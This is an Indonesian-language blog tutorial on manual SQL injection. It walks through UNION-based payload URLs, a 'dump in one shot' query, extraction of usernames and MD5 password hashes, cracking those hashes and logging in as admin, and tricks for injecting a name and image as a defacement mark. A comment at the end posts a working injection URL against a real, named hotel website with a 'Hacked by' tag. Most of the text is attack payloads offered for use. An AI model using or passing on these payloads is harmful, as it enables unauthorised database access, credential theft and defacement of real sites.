Tutorial Sql Injection Manual + Print Gambar & Nama
Hay hay guyss , masih tetep sama admin yang gans ini ea wkwkw , kalau sebelumnya kita pernah bahas teknik sql inejction dengan bantuan tools yang namanya SQLMap kali ini kita bakal belajar cara manualnya , yang belum tau apa itu sql injection bisa dibaca DISINI
Nah selain itu mimin bakal kasih bonus trik print gambar dan nama di akhir artikel , ok tidak usah berlama lama langsung saja simak tutorialnya sampai habis.
1. Seperti biasa siapkan website yang vuln terhadap serangan Sql Injection , tandanya kalau vuln gimana min ?? kalau webnya vuln maka akan muncul error ketika kita memberi karater (') di parameternya. Untuk pesan error akan berbeda-beda yaa,salain itu jika website blank juga kemungkinan vuln
2. Selanjutnya adalah mencari jumlah tabel yang ada dalam database dengan menggunakan query Order by , contoh https://target.com/p?id=12'+ORDER+BY+1--+ , maka web akan normal kembali
4. Nah disitu mimin error di angka 13, logikanya begini ketika kita melakukan perintah order by 1,2,3 dan seterusnya sampai 12 tidak error dan di nomor 13 terjadi error , itu artinya jumlah tabel yang ada didalam database tidak sampai 13 , lalu berapa jumlah tablenya min?? jumlah tabelnya yaitu 12 karena merupakan angka terakhir yang tidak error.
5. Berikutnya kita akan cari angka togelnya wkkw , gunakan perintah UNION SELECT, contohnya https://target.com/p?id=12'+UNION+SELECT+1,2,3,4,5,6--+ , untuk angkanya sesuaikan jumlah tabelnya di step nomor 4 ya
6. Maka akan keluar angka seperti diatas yang saya lingkari , disitu keluar angka 9 berarti kita bisa lakukan injeksi di angka tersebut, ganti angka 9 dengan perintah concat(database(),version()) , untuk mengetahui database dan versi yang digunakan , contohnya https://target.com/p?id=12'+UNION+SELECT+1,2,3,4,5,6,7,8,concat(database(),version()),10,11,12--+
7. Untuk melakukan dump table pada database kita gunakan query DIOS (Dump In One Shot) ,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x), contohnya seperti ini https://target.com/p?id=12'+UNION+SELECT+1,2,3,4,5,6,7,8,concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),10,11,12--+
8. Disini kita sudah tau tabel & kolom di dalam database nya , disini saya akan dump data username dan password yang ada ditabel penggua caranya seperti ini ,https://target.com/p?id=12'+UNION+SELECT+1,2,3,4,5,6,7,8,group_concat(username,0x3a,passworduser),10,11,12+FROM+pengguna--+
9. Sudah muncul username dan password , akan tetapi password masih terenkripsi dengan tipe hash MD5 , kita decrypt terlebih dahulu dengan online tools
10. Username sudah , password juga sudah tinggal kita cari halaman adminnya saja kemudian login haha
11. Sekarang saatnya bonus trik , cara print image + nama , pertama kalian masuk https://www.online-toolz.com/tools/text-hex-convertor.php untuk convert he HEX , kemudian isi dengan nama kalian atau apalah terserah kalian , kemudian copy HEX outputnya
12. Tamabhkan 0x didepan Hex output kalian , contoh 0x53716c20496e6a656374696f6e2 , kemudian masukan pada step nomor 7 , jadinya seperti ini https://target.com/p?id=12'+UNION+SELECT+1,2,3,4,5,6,7,8,concat(0x53716c20496e6a656374696f6e2,'<br>',database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),10,11,12--+
13. Untuk print gambar mudah sekali tinggal menambahka tag html <img src = "link-gambar.com/gambar.jpg"> , hasilnya kira kira seperti ini https://target.com/p?id=12'+UNION+SELECT+1,2,3,4,5,6,7,8,concat(0x53716c20496e6a656374696f6e2,'<br>','<img src ="link-gambar.com/gambar.jpg">',database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),10,11,12--+
Nah itu tadi tutorial dari saya yang mungkin bisa membuat ada agak pusing hehe, soalnya saya sendiri juga pusing gan wkwk , dahlah ya untuk kalian yang belum jelas atau mau tanya-tanya langsung saja komen dibawah , yang pengen request tutorial juga bisa komen , jangan lupa dishare ke temen-temennya ya , see you next time
Punya gua
http://www.hotelsalak.co.id/?page=promotions&subpage=detail&id=48%27AND+0+UNION+SELECT+1,concat(0x4861636B6564206279206C6F72642072656D6274756B20333433,%27%3Cbr%3E%27,%27%3Cimg%20src%20=%22https://i.ibb.co/hsJQkDN/IMG-20220309-223648.jpg%22%3E%27,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7,8--+-#
Komen